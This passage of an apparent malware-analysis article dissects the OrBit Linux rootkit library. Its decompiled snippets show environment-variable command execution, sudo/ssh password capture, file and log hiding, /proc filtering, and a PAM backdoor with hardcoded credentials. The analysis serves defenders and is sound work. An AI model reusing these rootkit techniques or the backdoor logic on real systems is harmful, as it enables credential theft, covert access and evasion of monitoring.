</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>Source code of the ld.so binary</strong>
1869 /* There usually is no ld.so.preload file, it should only be used
1870 for emergencies and testing. So the open call etc should usually
1871 fail. Using access() on a non-existing file is faster than using
1872 open(). So we do this first. If it succeeds we do almost twice
1873 the work but this does not matter, since it is not for production
1874 use. */
1875 static const <strong>char</strong> preload_file[] = "/etc/ld.so.preload";</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>As the variable is declared constant, its value is found in the compiled binary, in the <code><strong>.rodata </strong></code>section.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="660" height="55" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20660%2055'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 9" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-9.png 660w, https://www.stormshield.com/wp-content/uploads/orbit-capture-9-300x25.png 300w" data-lazy-sizes="(max-width: 660px) 100vw, 660px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-9.png" /><noscript><img width="660" height="55" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-9.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 9" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-9.png 660w, https://www.stormshield.com/wp-content/uploads/orbit-capture-9-300x25.png 300w" sizes="(max-width: 660px) 100vw, 660px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>When the linker is executed, the program retrieves the value located at the location of this string.</p>
<p>If this string is modified, the new value will be used by the binary when initializing the <strong><code>preload_file</code></strong> variable and the location remains the same.</p>
<p>Thus, the malware can insert a string representing the path to a file containing its own list of shared libraries.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h2>OrBit library</h2>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

<div class="qode-advanced-pricing-table">
	<div class="qode-apt-header qode-apt-row">
		<div class="qode-apt-title-holder">
			<h5 class="qode-apt-title">
							</h5>
		</div>
		<div class="qode-apt-column-title-holder">
			<h5 class="qode-apt-title">
							</h5>
		</div>
	</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Type			</div>
			<div class="qode-apt-item-price">
				$ELF			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Architecture			</div>
			<div class="qode-apt-item-price">
				$x86-64			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Obfuscation			</div>
			<div class="qode-apt-item-price">
				$XOR on string			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Debugging information				</div>
			<div class="qode-apt-item-price">
				$Yes			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				Required Privileges				</div>
			<div class="qode-apt-item-price">
				$No			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				SHA-256			</div>
			<div class="qode-apt-item-price">
				$40b5127c8cf9d6bec4dbeb61ba766a95c7b2d0cafafcb82ede5a3a679a3e3020			</div>
		</div>
			<div class="qode-apt-items qode-apt-row">
			<div class="qode-apt-item-title">
				MD5			</div>
			<div class="qode-apt-item-price">
				$ac89d638cb6912b58de47ac2a274b2fb			</div>
		</div>
			</div>	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>The library has several purposes, it allows the malware to remain discreet by modifying network captures and preventing users from manipulating malicious files.</p>
<p>It also allows capturing passwords and allowing SSH connections with a predefined username and password to bypass authentication.</p>
<h3 id="OrbitEN-Modificationofsystemcallinterfaces" class="western">Modification of system call interfaces</h3>
<p align="justify">Instead of directly calling the functions that interface to system calls (<code><strong>write</strong></code>, <code><strong>open</strong></code>, <code><strong>stat</strong></code>, etc.), the library uses <code><strong>syscall</strong></code> directly, which takes as a parameter the number of the desired system call followed by the arguments usually sent.</p>
<p align="justify">This method is used because the library itself defines its own interfaces with malicious effects for certain system calls and therefore cannot use them to obtain standard behavior.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="1024" height="466" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201024%20466'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 10" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-10-1024x466.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10-300x136.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10-768x349.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10-1396x635.png 1396w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10-700x318.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10.png 1532w" data-lazy-sizes="(max-width: 1024px) 100vw, 1024px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-10-1024x466.png" /><noscript><img width="1024" height="466" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-10-1024x466.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 10" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-10-1024x466.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10-300x136.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10-768x349.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10-1396x635.png 1396w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10-700x318.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-10.png 1532w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3>Obfuscation</h3>
<p align="justify">The library contains strings obfuscated with <strong>XOR</strong> encryption within the data section.</p>
<p align="justify">The decryption is done on the fly with a key measuring one byte and having the value <code><em><strong>0xA2 </strong></em></code>(<code>162</code>).</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>xor cypher</strong> 
for (i = 0; i &lt; len_string; ++i)
    string[i] = obfuscated_string[i] ^ 0xA2;
string[i] = 0;</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3>Constructor</h3>
<p align="justify">In a code compiled with <em><strong>GCC</strong></em>, it is possible to add attributes to the functions, these attributes allow to modify the compilation in order to change the behavior of the program during its execution.</p>
<p align="justify">Among them, we find the constructor and the destructor, allowing respectively to execute code before and after the <code><strong>main</strong></code> function of a program.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="1024" height="413" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201024%20413'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 11" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-11-1024x413.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-300x121.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-768x310.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-1536x620.png 1536w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-1396x563.png 1396w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-700x282.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11.png 1685w" data-lazy-sizes="(max-width: 1024px) 100vw, 1024px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-11-1024x413.png" /><noscript><img width="1024" height="413" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-11-1024x413.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 11" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-11-1024x413.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-300x121.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-768x310.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-1536x620.png 1536w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-1396x563.png 1396w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11-700x282.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-11.png 1685w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h4>_do_global_ctors_aux</h4>
<p align="justify">In the library, there is a function <code><strong>_do_global_ctors_aux</strong></code>, this is where the functions with the <code><strong>constructor</strong></code> attribute are called..</p>
<p>The program retrieves the <strong><code>fct_ptr</code> </strong>array, created by the compiler and which contains the addresses of the functions to be executed.</p>
<p>If this array is not empty, a loop goes through each entry to call the functions.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>_do_global_ctors_aux()</strong> 
fct = array_fct_constructor;
if (array_fct_constructor != -1) {
    fct_iterator = &amp;array_fct_constructor;
    do {
        --fct_iterator;
        fct();
        fct = *fct_iterator;
    } while (fct_iterator != -1);
}
return (fct);</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>


	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h4>__libc_sym_init</h4>
<p>This function with the <code><strong>constructor</strong></code> attribute is split into parts, the first executes a user command via an environment variable while the second executes a predefined file.</p>
<p>If the environment variable <em><strong>HTTP_X_MAGICAL_PONIES</strong></em> is present when a program is executed, its value will be executed as a command line before the variable is deleted.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>__libc_sym_init() - Command execution</strong>
if (<strong>getenv</strong>("HTTP_X_MAGICAL_PONIES")) {
    command = <strong>getenv</strong>("HTTP_X_MAGICAL_PONIES");
    unsetenv("HTTP_XMAGICAL_PONIES");
    <strong>system</strong>(command);
}</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>In the second step, if the program name contains <em><strong>cron</strong></em>, the file <em><code>/dev/shm/.lck</code></em> is created and its owner group id is set to <strong>920366</strong> then the file is closed.</p>
<p>A new process is created to run the  <code><em>.boot.sh</em></code>, a group id <strong>920366</strong> is assigned to it to get the maximum permissions.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>__libc_sym_init() - Execution of the .boot.sh file</strong> 
v0 = <strong>strstr</strong>(_progname, "cron");
if (v0) {
    v0 = syscall(2, "/dev/shm/.lck", 192, 420); // open()
    fd = v0;
    if (v0 &gt;= 0) {
        syscall(93, fd, 0, 920366); // chown()
        sycall(3, fd); // close()
        v0 = fork();
        if (!v0) {
            syscall(106, 920366); // setgid()
            len_string = 27;
            for (i = 0; i &lt; len_string; ++i)
                string[i] = obfuscated_string[i] ^ 0xA2; // /lib/libntpVnQE6mk/.boot.sh
            string[i] = 0;
            stream = popen(string, "r");
            pclose(stream);
            <strong>exit</strong>(0);
        }
    }
}</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>The <code><em>.boot.sh</em></code> is left empty when the dropper creates it, but it is easy to imagine that an attacker connected via <strong>SSH</strong> could add commands to exfiltrate the collected data.</p>
<p align="justify">By using a file rather than the  <em><strong>cron</strong></em>, service, the malware remains discreet and avoids being detected with the <em><strong>crontab -l</strong></em> command which lists the various tasks; on the other hand, the attacker does not control the recurrence of the execution of his script.</p>
<h3 id="OrbitEN-PasswordCapture" class="western">Password Capture</h3>
<p align="justify">In order to recover the passwords entered by a user, the <strong><code>write</code></strong> and <strong><code>read</code></strong> functions are modified and used in a complementary way with the global variables  <strong><code>sshpass</code> </strong>and <strong><code>sniff_ssh_session</code></strong>.</p>
<p align="justify"><em><strong>Sudo</strong></em> and <em><strong>ssh</strong></em> programs have in common that they display a sentence like <em><strong>[sudo] pass</strong></em> or <em><strong>'s password</strong></em> to tell the user to enter his password, which implies that the next calls to <code><strong>read</strong></code> will be used to recover the password.</p>
<p align="justify">If one of these strings is detected in the <strong><code>write</code></strong> function ,the <code><strong>sshpass</strong></code> variable takes the value <strong>1</strong>.</p>
<p align="justify">With this value, the <code><strong>read</strong></code> function saves each entry in the file <code><em>sshpass2.txt</em></code> until it reads a newline (<strong><code>\n</code></strong>) sets <code><strong>sshpass</strong></code> to <strong>0</strong>.</p>
<p align="justify">This mechanism allows to save only the user passwords without having to save each entry.</p>
<p align="justify">Once the password is entered, the <code><strong>read</strong></code> function checks the existence of the <code><em>.sniff</em></code> file. If it is present on the system, <code><strong>sniff_ssh_session</strong></code> takes the value <strong>1</strong>. This variable is used in <code><strong>write</strong></code>, a value of <strong>1</strong> will save all the content of the ssh session in the file <code><em>sniff.txt</em></code>.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="742" height="701" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%20742%20701'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 12" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-12.png 742w, https://www.stormshield.com/wp-content/uploads/orbit-capture-12-300x283.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-12-700x661.png 700w" data-lazy-sizes="(max-width: 742px) 100vw, 742px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-12.png" /><noscript><img width="742" height="701" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-12.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 12" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-12.png 742w, https://www.stormshield.com/wp-content/uploads/orbit-capture-12-300x283.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-12-700x661.png 700w" sizes="(max-width: 742px) 100vw, 742px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3>Hiding in the file system</h3>
<p align="justify">To avoid that the files related to the malware can be listed, read, written or deleted by an ordinary user, the library redefines the <code><strong>stat</strong></code> ystem call which allows to get information about a file or a directory.</p>
<p align="justify">Thus, the library can retrieve the identifier of the group that owns a file in functions like <code><strong>open</strong></code>, <code><strong>readdir</strong></code> or <code><strong>opendir</strong></code>.</p>
<p align="justify">If this group identifier is <strong>920366</strong> and the user does not have this id, the library refuses access and the file or directory cannot be opened or read.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>Verification of the group identifier</strong>
is_malicious = syscall(4, path, &amp;info_file) &gt;= 0 &amp;&amp; info_file.st_gid == 920366; // stat()
if (is_malicious &amp;&amp; syscall(104) != 920366) { // getgid()
    return (-1);
}</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h4>Open fonction</h4>
<p>This function has the goal of making the malware as undetectable as possible.</p>
<p align="justify">The <strong>procfs</strong> is a file system that allows to get information about the running processes, several files that allow to detect the malware are located there.</p>
<ul>
<li><code><em>/proc/net/tcp</em></code> which contains the list of active TCP connections</li>
<li><code><em>/proc/*/maps</em></code>, <em><code>/proc/*/smaps</code> </em>and <code><em>/proc/*/numa_maps</em></code> which contain information about the memory representation of a process.<br />
Among this information are the name and address of the different segments of a program, so the dynamic libraries used are present.</li>
</ul>
<p>If one of these files is passed as a parameter to the <code><strong>open</strong></code> function, the library creates a temporary file. Inside this file, the content of the original file is copied line by line, excluding those containing information about suspicious activity.</p>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_single_image wpb_content_element vc_align_center">
		<div class="wpb_wrapper">
			
			<div class="vc_single_image-wrapper   vc_box_border_grey"><img width="1024" height="484" src="data:image/svg+xml,%3Csvg%20xmlns='http://www.w3.org/2000/svg'%20viewBox='0%200%201024%20484'%3E%3C/svg%3E" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 13" data-lazy-srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-13-1024x484.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-13-300x142.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-13-768x363.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-13-700x331.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-13.png 1316w" data-lazy-sizes="(max-width: 1024px) 100vw, 1024px" data-lazy-src="https://www.stormshield.com/wp-content/uploads/orbit-capture-13-1024x484.png" /><noscript><img width="1024" height="484" src="https://www.stormshield.com/wp-content/uploads/orbit-capture-13-1024x484.png" class="vc_single_image-img attachment-large" alt="" decoding="async" title="OrBit - capture 13" srcset="https://www.stormshield.com/wp-content/uploads/orbit-capture-13-1024x484.png 1024w, https://www.stormshield.com/wp-content/uploads/orbit-capture-13-300x142.png 300w, https://www.stormshield.com/wp-content/uploads/orbit-capture-13-768x363.png 768w, https://www.stormshield.com/wp-content/uploads/orbit-capture-13-700x331.png 700w, https://www.stormshield.com/wp-content/uploads/orbit-capture-13.png 1316w" sizes="(max-width: 1024px) 100vw, 1024px" /></noscript></div>
		</div>
	</div>
</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>The <code><em>/var/log/lastlog</em></code> file which contains the list of users having connected in SSH is also targeted by the malicious library.</p>
<p>In order to avoid that the attacker's connections are listed, the library returns a file descriptor on <em><code>/dev/null</code></em> which results in writing the logs nowhere.</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>open() - Hiding suspicious SSH connections</strong>
if ( syscall(104) == 920366 ) // getgid()
{
    len = 4;
    for ( k = 0; k &lt; len; ++k )
      sshd[k] = obfuscated_string[k] ^ 0xA2;
    sshd[len] = 0;
    if ( !<strong>strcmp</strong>(_progname, sshd) )
    {
      len = 7;
      for ( m = 0; m &lt; len; ++m )
        lastlog[m] = obfsucated_string_2[m] ^ 0xA2;
      lastlog[len] = 0;
      if ( <strong>strstr</strong>(filename, lastlog) )
        haystack = "/dev/null";
    }
  }
/* ... */
return syscall(2, haystack, mode, flags);</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<h3>Backdoor</h3>
<p>To allow an attacker to get access to the infected machine, the library rewrites several functions of the <strong>PAM</strong> library which is used to centralize and configure authentications for different programs (<em><strong>sudo</strong></em>, <em><strong>sshd</strong></em>, <em><strong>cron</strong></em>, etc...).</p>
<p>The <code><strong>pam_authenticate</strong></code> function is used to authenticate a user to a service, it is responsible for retrieving the username and password.</p>
<p>In the implementation of the library, its role is also to allow an attacker to connect with an identifier("<code><em><strong>2l8</strong></em></code>").</p>
<p>In case this username is entered, the port involved in the connection is added to the .ports file and the group ID for the user is given the value <strong>920366</strong>.</p>
<p>The password is checked by the <code><strong>pam_get_password</strong></code>, which will return a success value if the password sent is ("<code><em><strong>c4ss0ul3tt3</strong></em></code>").</p>

		</div> 
	</div> 	<div class="vc_empty_space"  style="height: 32px" ><span
			class="vc_empty_space_inner">
			<span class="empty_space_image"  ></span>
		</span></div>

</div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style='background-color:#ececec; padding-top:30px; padding-bottom:30px; text-align:left;'><div class=" full_section_inner clearfix" style='padding: 0% 10%'><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<pre><strong>pam_get_password() - Hardcoded password</strong>
len = 3;
for (i = 0; i &lt; len; ++i) {
    password_2l8[i] = obfuscated_string[i] ^ 0xA2;
password_2l8[len] = 0;
if (!<strong>strcmp</strong>(username, password_2l8)) {
    /* ... */
    len = 25;
    for (j = 0; j &lt; len; ++j)
        ports_filename[j] = obfuscated_string_2[j] ^ 0xA2;
    ports_filename[len] = 0;
    fd = syscall(2, ports_filename, 1090, 420); // open()
    /* ... */
    syscall(1, fd, port_to_hide, len_port_to_hide); // write()
    syscall(3, fd); // close()
    syscall(106, 920366); // set_gid()
    if (pam_get_password(...))
        return (0); // Authentication done
    else
        return (6); // Authentication failed
}</pre>

		</div> 
	</div> </div></div></div></div></div><div      class="vc_row wpb_row section vc_row-fluid " style=' text-align:left;'><div class=" full_section_inner clearfix"><div class="wpb_column vc_column_container vc_col-sm-12"><div class="vc_column-inner"><div class="wpb_wrapper">
	<div class="wpb_text_column wpb_content_element ">
		<div class="wpb_wrapper">
			<p>In the other hand, if a lambda user connects, and the <code><strong>.logpam</strong></code> file exists, the original function is called, in case of success, the <code><strong>pam_log_password</strong></code> function writes the username and password in the <code><em>sshpass.txt</em></code> file.</p>
<h3 id="OrbitEN-Modifyingnetworkframes">Modifying network frames</h3>
<p>To prevent the attacker's <strong>SSH</strong> connections or other network activities from being detected, <code><strong>bind</strong></code> et <code><strong>connect</strong></code>  as well as some functions of the <strong>pcap</strong> are reimplemented by the malware.</p>
<h4 id="OrbitEN-bind/connect">bind / connect</h4>
<p>The <strong><code>bind</code></strong> function is used to assign a socket to an ip address and a port, this function is necessary when a program wants to take the role of a server to be able to accept new incoming connections.</p>
